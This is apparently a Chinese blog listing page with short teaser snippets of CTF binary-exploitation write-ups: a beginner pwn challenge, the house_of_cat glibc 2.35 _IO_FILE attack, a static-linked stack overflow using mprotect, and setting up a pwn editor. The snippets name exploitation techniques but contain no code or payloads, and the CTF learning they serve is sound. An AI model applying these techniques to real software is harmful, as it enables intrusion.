    浏览(33)
  • 攻防世界hello pwn WP(pwn入门基础题)

    题目网址: 攻防世界 下载文件,文件名太长了把文件改名为pwn 把pwn文件放入kali里面 file一下查看文件类型 发现是一个64位的elf文件,加个运行权限,运行一下看看  使用 checksec 检查保护 发现只开了 NX 保护。 把pwn放入64位IDA中,F5反汇编一下main函数 得到main函数伪代码 点击

    2024年02月10日
    浏览(44)
  • 强网杯2022 pwn 赛题解析——house_of_cat

    这道题在pwn方向是做出来的队伍最多的一道题,但由于笔者之前对于高版本glibc的_IO_FILE攻击方式不甚了解,因此比赛的时候跳过了。本文就对该题进行从原理到实战的详细分析,帮助读者理解本题使用过的攻击方式。 本题使用的glibc版本是2.35,是目前ubuntu 22.04上最新的glib

    2024年02月05日
    浏览(37)
  • CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)

    首先我们先将pwn文件下载下来,然后赋上可执行权限,再来查看pwn文件的保护信息。 我们可以看到这是一个32位的pwn文件,并且保护信息开启了NX和canary,也就是堆栈不可执行且有canary。最最最重要的是这个文件是statically linked!!!静态编译文件呀! 根据题目的提示,我们

    2024年02月13日
    浏览(39)
  • 从零开始配置pwn环境:sublime配置并解决pwn脚本报错问题

    Download - Sublime Text 用vscode鼠标右键调出命令平台  输入 convert indentation to Tabs,保存文件  完美解决,具体如下:

    2024年01月22日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包